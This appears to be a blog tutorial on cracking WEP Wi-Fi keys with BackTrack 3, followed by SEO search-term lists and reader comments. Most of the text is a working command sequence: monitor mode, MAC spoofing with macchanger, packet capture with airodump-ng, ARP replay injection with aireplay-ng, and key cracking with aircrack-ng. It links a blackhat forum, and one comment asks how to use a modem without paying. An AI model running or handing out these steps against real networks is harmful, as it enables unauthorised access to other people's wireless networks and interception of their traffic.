Wireless hacking with backtrack 3 tutorial

Wi-Fi logo
Image via Wikipedia

Wireless Hacking with backtrack 3 is easy to do , in this article I’d like to guide you in Wireless hacking with backtrack 3. This tutorial is made based on some requests by my subscribers , they’ve been familiar enough with Backtrack 3 , that’s why I made this Wireless Hacking with backtrack 3 tutorial. In order to start the wireless hacking , you need to make sure that you have met these requirements :

- Backtrack 3 new release

- 1 wireless router

- Laptop with wireless card

And let the hack begins :

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, aor connecting to the AP.

***********************************************************************
Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON’T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1
(bssid) = This is the consenting computers bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:33:44:55
************************************************************************

Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Double click the home icon, rigt click the blank white area and select create new Txt File name it Exidous or what ever you want! click ok, now close the window.

Ok let’s start!
Commands | Meaning
====================

*open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing were going to do is stop the device aka ethernet card
airmon-ng stop ath0

* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
ifconfig (device) down

* Ok now just to make things simpler, so we don’t have to hunt down what our Mac address is
macchanger –mac 00:11:22:33:44:55 (device)

* Now were going to start the wireless card *make it listen for AP’s
airmon-ng start (device)

* Lets start seeing what AP’s are there
airodump-ng (device)

* After you see all the AP’s execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of consenting computer

* Now on to the consenting computer’s AP (were listening in for authentication packets
airodump-ng -c 6 -w Exidous –bssid (Bssid) (device)

* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now were going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV’s for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV’s for 128 bit encryption
aircrack-ng -n 64 –bssid (bssid) Exidous-01.cap

* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this. 33C7C60930
more informations : http://www.blackhat-forums.com/index.php?showforum=30

Recenly search

Incoming search terms for the article:

backtrack 3 tutorialbacktrack tutorialbacktrack wireless hackingbacktrack 3wireless hacking tutorialbacktrack wirelessbacktrack 3 wireless hackingbacktrack wifi hackbacktrack wireless hackbacktrack hack wifibacktrack wifi hackingbacktrack 3 wpabacktrack hackingwifi hack BackTrackhow to use backtrack 4 to hack wirelesshack wifi backtrackbacktrack wpa tutorialwireless hacking backtrackhacking wireless with backtrackhack wpa backtrackhack wifi with backtrackbacktrack hack wirelessbacktrack hacking tutorialshack wireless backtrackhack wireless with backtrackhacking wifi with backtrackbacktrack 3 wifi hackinghacking with backtracktutorial backtrack 3wpa hack backtrackhacking wireless backtrackbacktrack hackbacktrack 3 wirelesswifi hacking backtrackbacktrack hack wpawireless hacking with backtrackcracking wpa with backtrack 3backtrack 3 wpa crack tutorialwpa hacking backtrackbacktrack wpa hackhow to hack wireless with backtrackbacktrack 4 wireless hackingwifi hack with backtrackbacktrack 4 wireless hackhow to hack wpa with backtrackWireless hacking tutorialswireless hack backtrackbacktrack 3 wifi hackWiFi Hack using BackTrack 3bt3 wireless hacking,  
Popular Today naruto shippuden 170 videologcat physics walkthroughnaruto shippuden 168 videologfacebook spybacktrack 3shy enginevtunnelBackTrack tutorialbacktrack 3 tutorialfacebook photo viewerSee The Shocking Hidden Message In The Google Logo that GOOGLE Does NOT Want You To Know About!how to view private myspace picturesmy empire hackview private myspace picturesSHOCKING: RUDE HIDDEN MESSAGE in Toy Story 3!facebook keyloggerHIDDEN MESSAGE IN GOOGLE LOGOTerri Moulton Hormanrapidleechbrute force facebook,   Computer Security Stuff on eBay!
Electronics stuffs on ebay

7 Responses to “Wireless hacking with backtrack 3 tutorial”

  1. [...] Wireless hacking with backtrack 3 tutorial [...]

  2. [...] I hope nobody uses this for any purpose other than to better familiarize themselves with wireless security and better understand what risks do exist: LifeDork [...]

  3. Keep it up for the good work you are doing. I really more informed now than before regarding wireless hacking

  4. Looking forward to understanding this better as I am currently being hacked.

  5. hi
    this is pranav
    i am new to backtrack, but i have played with redhat linux long back
    i got bt3 installed and running good, but the only problem is that , the wireless lan card is not installed , where can i find the drivers for broadcom mini wireless for dell xps 1530

    and how to install them

  6. please i will like to get information on how to use a network modem without suscribing to their monthly tariffs. please i will be happy for you to give me information. please anybody with the information should email me: thenigerianprof@yahoo.com

  7. Hi, i am trying hard on backtrack 3 and every steps runs fine till ” aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device) ” as there are many packets reads but do not have any ARP requests and 0 Acks ) with sent 0 packets (0 pps) ….i dont understand where is the problem. Any ideas ?

Leave a Reply